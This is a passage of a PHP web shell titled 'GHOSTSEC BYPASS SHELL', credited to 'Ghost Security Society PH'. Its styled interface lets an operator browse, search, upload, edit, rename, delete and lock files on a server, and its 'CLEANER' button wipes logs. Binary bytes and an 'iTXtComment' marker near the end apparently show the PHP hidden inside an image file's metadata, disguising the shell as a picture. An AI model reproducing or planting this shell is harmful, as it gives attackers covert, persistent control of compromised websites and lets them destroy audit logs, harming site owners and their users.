    0 0 20px rgba(255,255,255,0.1);
  transform:translateY(-2px);
}
.search-input::placeholder{
  color:var(--muted);
  font-weight:700;
}

/* Browsing display block - aligned horizontally */
.browse-block{
  display:flex;
  gap:12px;
  align-items:center;
  background:transparent;
  min-width:380px;
  justify-content:flex-end;
}
.browse-label{font-size:13px;color:var(--muted);text-align:right;text-shadow:1px 1px 2px rgba(0,0,0,0.3)}
.current-path{
  font-weight:900;
  color:var(--accent);
  background:linear-gradient(145deg,#3a3a3a,#2d2d2d);
  padding:10px 14px;
  border-radius:14px;
  border:1px solid var(--border);
  max-width:520px;
  overflow:hidden;
  text-overflow:ellipsis;
  white-space:nowrap;
  box-shadow:inset 3px 3px 8px rgba(0,0,0,0.3);
}

/* NEW: CREATE BUTTONS GROUP */
.create-group {
  display: flex;
  gap: 12px;
  align-items: center;
  flex-wrap: wrap;
  margin-top: 16px;
  width: 100%;
  justify-content: center;
  border-top: 1px solid rgba(255,255,255,0.08);
  padding-top: 16px;
}

/* ALL BUTTONS WITH GRAY 3D STYLE */
.create-btn {
  background: linear-gradient(145deg, var(--btn-light), var(--btn-dark));
  color: #222222;
  padding: 12px 20px;
  border-radius: 14px;
  font-weight: 900;
  text-decoration: none;
  border: none;
  cursor: pointer;
  box-shadow: 
    8px 8px 20px rgba(0,0,0,0.4),
    -5px -5px 15px rgba(255,255,255,0.3);
  display: inline-flex;
  align-items: center;
  gap: 10px;
  transition: all 0.3s ease;
  letter-spacing: 1px;
}

.create-btn:hover {
  transform: translateY(-3px) scale(1.03);
  box-shadow: 
    12px 12px 25px rgba(0,0,0,0.5),
    -7px -7px 20px rgba(255,255,255,0.4);
}

.create-btn:active {
  transform: translateY(1px) scale(0.98);
  box-shadow: 
    inset 4px 4px 10px var(--btn-shadow),
    inset -4px -4px 10px rgba(255,255,255,0.6);
  background: linear-gradient(145deg, #b0b0b0, var(--btn-dark));
}

/* Actions: copy/upload/logout */
.action-group{
  display:flex;
  gap:12px;
  align-items:center;
}
.copy-btn, .logout-inside, .btn-small, .search-btn, .clear-logs-btn, .upload-btn{
  background: linear-gradient(145deg, var(--btn-light), var(--btn-dark));
  color:#222222;
  padding:12px 18px;
  border-radius:14px;
  font-weight:900;
  text-decoration:none;
  border:none;
  cursor:pointer;
  box-shadow:
    8px 8px 20px rgba(0,0,0,0.4),
    -5px -5px 15px rgba(255,255,255,0.3);
  display:inline-flex;
  align-items:center;
  gap:10px;
  transition: all 0.3s ease;
  letter-spacing: 1px;
}
.copy-btn:hover, .logout-inside:hover, .btn-small:hover, .search-btn:hover, .clear-logs-btn:hover, .upload-btn:hover{
  transform:translateY(-3px) scale(1.03);
  box-shadow:
    12px 12px 25px rgba(0,0,0,0.5),
    -7px -7px 20px rgba(255,255,255,0.4);
}
.copy-btn:active, .logout-inside:active, .btn-small:active, .search-btn:active, .clear-logs-btn:active, .upload-btn:active{
  transform:translateY(1px) scale(0.98);
  box-shadow:
    inset 4px 4px 10px var(--btn-shadow),
    inset -4px -4px 10px rgba(255,255,255,0.6);
  background: linear-gradient(145deg, #b0b0b0, var(--btn-dark));
}

/* Upload form styling */
.upload-form{
  display:inline-block;
  margin:0;
}
.upload-label{
  cursor:pointer;
  display:inline-flex;
  align-items:center;
  gap:8px;
  padding:12px 16px;
}
.upload-input{
  display:none;
}

/* Upload feedback */
.upload-feedback {
  position: fixed;
  top: 20px;
  right: 20px;
  background: linear-gradient(145deg, #2a2a2a, #1f1f1f);
  color: #9fe06c;
  padding: 14px 22px;
  border-radius: 14px;
  border: 1px solid var(--border);
  box-shadow: 
    10px 10px 25px rgba(0,0,0,0.5),
    -5px -5px 15px rgba(255,255,255,0.05);
  font-weight: 900;
  z-index: 1000;
  animation: slideIn 0.3s ease;
}

@keyframes slideIn {
  from { transform: translateX(100%); opacity: 0; }
  to { transform: translateX(0); opacity: 1; }
}

/* MAIN CARD (file list) */
.card{
  border-radius:20px;
  padding:22px;
  background:linear-gradient(145deg,var(--card-dark),var(--card-light));
  box-shadow:
    15px 15px 30px rgba(0,0,0,0.5),
    -8px -8px 20px rgba(255,255,255,0.05),
    inset 3px 3px 8px rgba(255,255,255,0.05),
    inset -3px -3px 8px rgba(0,0,0,0.3);
  border:1px solid var(--border);
  margin-top:20px;
}

/* Breadcrumb */
.breadcrumb{
  color:var(--muted);
  font-weight:700;
  display:flex;
  gap:10px;
  align-items:center;
  flex-wrap:wrap;
  margin-bottom:16px;
}
.breadcrumb a{
  color:var(--accent);
  text-decoration:none;
  padding:8px 12px;
  border-radius:12px;
  background:linear-gradient(145deg,#3a3a3a,#2d2d2d);
  font-weight:800;
  box-shadow:
    5px 5px 15px rgba(0,0,0,0.3),
    -3px -3px 10px rgba(255,255,255,0.05);
  transition:all 0.3s ease;
}
.breadcrumb a:hover{
  transform:translateY(-2px);
  box-shadow:
    8px 8px 20px rgba(0,0,0,0.4),
    -5px -5px 15px rgba(255,255,255,0.08);
}

/* Search results info */
.search-info{
  background:linear-gradient(145deg,#2a2a2a,#1f1f1f);
  padding:14px 18px;
  border-radius:14px;
  margin-bottom:20px;
  border:1px solid var(--border);
  box-shadow:inset 3px 3px 8px rgba(0,0,0,0.3);
}
.search-info h3{
  margin:0 0 10px 0;
  color:var(--accent);
  font-size:18px;
}
.search-info .clear-search{
  color:var(--muted);
  text-decoration:none;
  font-weight:800;
  font-size:13px;
}

/* File list */
.file-list{
  list-style:none;
  padding:0;
  margin:0;
  margin-top:12px;
  display:grid;
  gap:12px;
}
.file-item{
  display:flex;
  gap:14px;
  align-items:center;
  justify-content:space-between;
  padding:14px;
  border-radius:14px;
  background:linear-gradient(145deg,rgba(255,255,255,0.03),rgba(0,0,0,0.1));
  border:1px solid rgba(255,255,255,0.03);
  box-shadow:
    5px 5px 15px rgba(0,0,0,0.2),
    -3px -3px 10px rgba(255,255,255,0.03);
}
.file-left{
  display:flex;
  gap:14px;
  align-items:center;
  min-width:0;
  overflow:hidden;
}
.file-icon{
  width:60px;
  height:50px;
  border-radius:12px;
  background:linear-gradient(145deg,#3a3c3d,#272829);
  display:flex;
  align-items:center;
  justify-content:center;
  font-weight:900;
  color:#fff;
  flex-shrink:0;
  font-size:14px;
  box-shadow:
    inset 3px 3px 8px rgba(0,0,0,0.4),
    inset -3px -3px 8px rgba(255,255,255,0.1);
}
.file-info{min-width:0;overflow:hidden}
.name{
  font-weight:900;
  color:#f0f0f0;
  white-space:nowrap;
  overflow:hidden;
  text-overflow:ellipsis;
  font-size:16px;
  text-shadow:1px 1px 2px rgba(0,0,0,0.3);
}
.meta{color:var(--muted);font-size:13px;margin-top:6px}

/* file action buttons */
.file-actions{display:flex;gap:10px;align-items:center}
.btn-small{
  padding:10px 14px;
  border-radius:12px;
  font-size:13px;
  letter-spacing: 0.5px;
}

/* footer */
footer.note{text-align:center;color:var(--muted);font-weight:800;margin-top:20px;text-shadow:1px 1px 2px rgba(0,0,0,0.3)}

/* Responsive adjustments */
@media (max-width:1000px){
  .search-box{min-width:260px}
  .browse-block{min-width:280px}
  .brand img{width:52px;height:52px}
  .file-icon{width:52px;height:44px}
}
@media (max-width:700px){
  .top-card{flex-direction:column;align-items:stretch}
  .controls{justify-content:space-between;width:100%}
  .search-box{order:2;width:100%;min-width:0;margin-top:16px}
  .browse-block{justify-content:space-between;min-width:0;order:1;width:100%}
  .action-group{order:3;width:100%;justify-content:center;margin-top:16px}
  .create-group{order:4;justify-content:center}
  .current-path{max-width:65%}
  .file-item{flex-direction:column;align-items:flex-start}
  .file-actions{width:100%;justify-content:flex-start;gap:8px;flex-wrap:wrap}
}
</style>
<script>
/* Initialize lastClickedPath to the server-side full path (JS-safe via json encoding) */
let lastClickedPath = <?php echo json_encode($fullPath, JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_AMP|JSON_HEX_QUOT); ?>;
let searchTimeout = null;

// Get scroll position from URL or default to 0
let currentScrollPos = <?php echo isset($_GET['scroll']) ? intval($_GET['scroll']) : 0; ?>;

/* Update displayed path and internal value — safe escaping handled server-side */
function setPath(path){
  lastClickedPath = path;
  const d = document.getElementById('currentPathDisplay');
  if(d) {
    d.innerText = path;
  }
}

/* Copy path robustly (navigator.clipboard with textarea fallback) */
function copyPath(){
  const text = lastClickedPath || (document.getElementById('currentPathDisplay') && document.getElementById('currentPathDisplay').innerText) || '';
  if (!text) {
    alert('No path to copy.');
    return;
  }
  if (navigator.clipboard && navigator.clipboard.writeText) {
    navigator.clipboard.writeText(text).then(function(){ alert('Copied:\\n' + text); }).catch(function(){
      fallbackCopy(text);
    });
  } else {
    fallbackCopy(text);
  }
}
function fallbackCopy(text){
  try {
    const ta = document.createElement('textarea');
    ta.value = text;
    ta.style.position = 'fixed';
    ta.style.left = '-9999px';
    document.body.appendChild(ta);
    ta.select();
    document.execCommand('copy');
    document.body.removeChild(ta);
    alert('Copied:\\n' + text);
  } catch (e) {
    alert('Could not copy.');
  }
}

/* Search functionality with auto-submit */
function handleSearchInput(value) {
  clearTimeout(searchTimeout);
  searchTimeout = setTimeout(function() {
    if (value.length >= 2 || value.length === 0) {
      document.getElementById('searchForm').submit();
    }
  }, 500);
}

/* Clear search */
function clearSearch() {
  document.getElementById('searchInput').value = '';
  document.getElementById('searchForm').submit();
}

/* Enhanced upload functionality */
function handleFileUpload(input) {
  if (input.files && input.files[0]) {
    // Show immediate feedback
    showUploadFeedback('Uploading file...');
    
    // Submit the form
    const form = input.closest('form');
    if (form) {
      form.submit();
    }
  }
}

/* Save scroll position before any action */
function saveScrollPosition() {
  const scrollPos = window.pageYOffset || document.documentElement.scrollTop;
  
  // Update all links to include scroll position
  document.querySelectorAll('a[href*="?"]').forEach(link => {
    const href = link.getAttribute('href');
    if (href && href.includes('?')) {
      // Remove existing scroll parameter if present
      let newHref = href.replace(/&scroll=\d+/, '');
      // Add current scroll position
      newHref += (newHref.includes('?') ? '&' : '?') + 'scroll=' + scrollPos;
      link.setAttribute('href', newHref);
    }
  });
  
  // Update forms to include scroll position
  document.querySelectorAll('form').forEach(form => {
    let existingScroll = form.querySelector('input[name="scroll"]');
    if (!existingScroll) {
      const scrollInput = document.createElement('input');
      scrollInput.type = 'hidden';
      scrollInput.name = 'scroll';
      scrollInput.value = scrollPos;
      form.appendChild(scrollInput);
    } else {
      existingScroll.value = scrollPos;
    }
  });
}

/* Restore scroll position */
function restoreScrollPosition() {
  if (currentScrollPos > 0) {
    setTimeout(() => {
      window.scrollTo(0, currentScrollPos);
    }, 100);
  }
}

/* Accessibility: allow clicking breadcrumb anchors with keyboard to update path */
document.addEventListener('DOMContentLoaded', function(){
  // ensure current-path has initial value
  const d = document.getElementById('currentPathDisplay');
  if(d && (!d.innerText || d.innerText.trim()==='')) {
    d.innerText = lastClickedPath;
  }
  
  // enhance breadcrumb anchors to set path (if not already set via inline onclick)
  const crumbs = document.querySelectorAll('.breadcrumb a');
  crumbs.forEach(function(a){
    if (!a.getAttribute('onclick')) {
      const href = a.getAttribute('href');
      try {
        const url = new URL(href, window.location.href);
        const p = url.searchParams.get('path');
        if (p) {
          a.setAttribute('data-path', decodeURIComponent(p));
          a.addEventListener('click', function(){ setPath(this.getAttribute('data-path')); });
        }
      } catch(e){}
    }
  });

// make file name elements that have onclick set their title (helpful on mobile)
  const names = document.querySelectorAll('.file-info .name');
  names.forEach(function(n){
    if (n && n.innerText) n.setAttribute('title', n.innerText);
  });
  
  // Show upload success message if present in URL
  const urlParams = new URLSearchParams(window.location.search);
  if (urlParams.get('upload') === 'success') {
    showUploadFeedback('File Uploaded!✅');
  }
  
  // Add scroll position preservation to all action links
  document.querySelectorAll('a[href*="?"]:not([href*="logout"])').forEach(link => {
    link.addEventListener('click', function(e) {
      if (!this.href.includes('logout')) {
        saveScrollPosition();
      }
    });
  });
  
  // Add scroll position preservation to form submissions
  document.querySelectorAll('form').forEach(form => {
    form.addEventListener('submit', saveScrollPosition);
  });
  
  // Restore scroll position on page load
  restoreScrollPosition();
});
</script>
</head>
<body onload="restoreScrollPosition();">
<?php // Display one-time toast (simple alert). Put this after the <body> tag.
if (!empty($_SESSION['toast'])) {
    $t = $_SESSION['toast'];
    echo "<script>try{showUploadFeedback('" . addslashes($t) . "');}catch(e){alert('" . addslashes($t) . "');}</script>";
    unset($_SESSION['toast']);
} ?>
<div class="wrap">
  <div class="top-card">
    <div class="brand">
      <img src="https://i.ibb.co/27S7vWvq/1762220205621.png" alt="logo">
      <div>
        <h2>GHOSTSEC BYPASS SHELL</h2>
        <div class="sub">3D Admin File Manager</div>
      </div>
    </div>

<div class="controls">
      
      <div class="search-box">
        <form method="get" id="searchForm" style="display:flex;gap:10px;width:100%;">
          <input type="hidden" name="path" value="<?php echo htmlspecialchars($path, ENT_QUOTES); ?>">
          <input type="hidden" name="scroll" value="<?php echo isset($_GET['scroll']) ? intval($_GET['scroll']) : 0; ?>">
          <input type="text" 
                 id="searchInput"
                 name="search" 
                 class="search-input" 
                 placeholder="Search files (.php, .txt, .js, .html, etc.)"
                 value="<?php echo htmlspecialchars($searchTerm, ENT_QUOTES); ?>"
                 oninput="handleSearchInput(this.value)">
          <button type="submit" class="search-btn">SEARCH</button>
        </form>
      </div>

<form method="post" enctype="multipart/form-data" class="upload-form">
          <input type="hidden" name="path" value="<?php echo htmlspecialchars($path, ENT_QUOTES); ?>">
          <input type="hidden" name="scroll" value="<?php echo isset($_GET['scroll']) ? intval($_GET['scroll']) : 0; ?>">
          <label class="upload-btn">
            UPLOAD
            <input type="file" name="upload" class="upload-input" onchange="handleFileUpload(this)" style="display:none">
          </label>
        </form>

<a class="clear-logs-btn" href="?clearlogs=1&<?php echo getRedirectParams(); ?>" onclick="saveScrollPosition(); return confirm('Are you sure you want to clear all logs? This action cannot be undone.')">CLEANER</a>
        
        <a class="logout-inside" href="?logout=1">LOGOUT</a>
      </div>
      
      
      <div class="create-group">
        <a class="create-btn" href="?create=file&<?php echo getRedirectParams(); ?>" onclick="saveScrollPosition();">CREATE - FILES</a>
        <a class="create-btn" href="?create=folder&<?php echo getRedirectParams(); ?>" onclick="saveScrollPosition();">CREATE FOLDER</a>
      </div>
    </div>
  </div>

<?php if ($searchTerm !== ''): ?>
    <div class="search-info">
      <h3>Search Results for "<?php echo htmlspecialchars($searchTerm, ENT_QUOTES); ?>"</h3>
      <div>Found <?php echo count($searchResults); ?> result(s)</div>
      <a href="?<?php echo getRedirectParams(); ?>" class="clear-search">Clear Search</a>
    </div>
    <?php endif; ?>

<ul class="file-list" aria-live="polite">
<?php
$displayItems = $searchTerm !== '' ? $searchResults : scandir($fullPath);

foreach ($displayItems as $entry) {
    if ($searchTerm !== '') {
        // For search results, $entry is already the full path
        $filePath = $entry;
        $entry = basename($entry);
    } else {
        // For normal directory listing
        if ($entry === '.' || $entry === '..') continue;
        $filePath = $fullPath . DIRECTORY_SEPARATOR . $entry;
    }
    
    $urlPath = rawurlencode($filePath);
    $isWritable = is_writable($filePath);
    $isDir = is_dir($filePath);
    $meta = $isDir ? "Directory" : (round(filesize($filePath)/1024,2) . " KB");
    $iconLabel = $isDir ? "DIR" : strtoupper(pathinfo($entry, PATHINFO_EXTENSION) ?: 'FILE');

// Check if item is locked by looking for backup file
    $isLocked = is_locked_backup_present($filePath);

// prepare JS-safe path for setPath calls
    $jsSafePath = addslashes($filePath);
    echo "<li class='file-item'>";
      echo "<div class='file-left'>";
        echo "<div class='file-icon' title='".htmlspecialchars($entry,ENT_QUOTES)."'>".htmlspecialchars($iconLabel,ENT_QUOTES)."</div>";
        echo "<div class='file-info'>";
          if ($isDir) {
              echo "<div class='name'><b>[<a href='?" . getRedirectParamsForLink($filePath) . "' onclick=\"setPath('".htmlspecialchars($jsSafePath,ENT_QUOTES)."')\" style='color:var(--accent);text-decoration:none;'>".htmlspecialchars($entry,ENT_QUOTES)."</a>]</b></div>";
          } else {
              echo "<div class='name' onclick=\"setPath('".htmlspecialchars($jsSafePath,ENT_QUOTES)."')\" style='cursor:pointer;color:var(--accent);'>".htmlspecialchars($entry,ENT_QUOTES)."</div>";
          }
          echo "<div class='meta'>".htmlspecialchars($meta,ENT_QUOTES)."</div>";
        echo "</div>";
      echo "</div>";

echo "<div class='file-actions' role='group' aria-label='file actions'>";
         if (!$isDir) {
             $editDisabled = ($isWritable && !$isLocked) ? "" : "style='opacity:.45;pointer-events:none;'";
             echo "<a class='btn-small' href='?edit=$urlPath&" . getRedirectParams() . "' $editDisabled onclick=\"saveScrollPosition();\">EDIT</a>";
         }
         echo "<a class='btn-small' href='?rename=$urlPath&" . getRedirectParams() . "' onclick=\"saveScrollPosition();\">RENAME</a>";
         echo "<a class='btn-small' href='?delete=$urlPath&" . getRedirectParams() . "' onclick=\"saveScrollPosition(); return confirm('Delete ".addslashes($entry)."?')\">DELETE</a>";
         if (!$isLocked) {
             echo "<a class='btn-small' href='?lock=$urlPath&" . getRedirectParams() . "' onclick=\"saveScrollPosition();\">LOCK</a>";
         } else {
             echo "<a class='btn-small' href='?unlock=$urlPath&" . getRedirectParams() . "' onclick=\"saveScrollPosition();\">UNLOCK</a>";
         }
      echo "</div>";
    echo "</li>";
}
?>
    </ul>
  </div>

<div class="card" style="text-align:center;font-weight:bold;margin-top:14px">
    @All Right Reserve Ghost Security Society PH - 2024
  </div>
</div>
</body>
</html>�_�X���iTXtComment�����<?php
session_start();
// Prevent browser caching
header("Cache-Control: no-cache, no-store, must-revalidate");
header("Pragma: no-cache");
header("Expires: 0");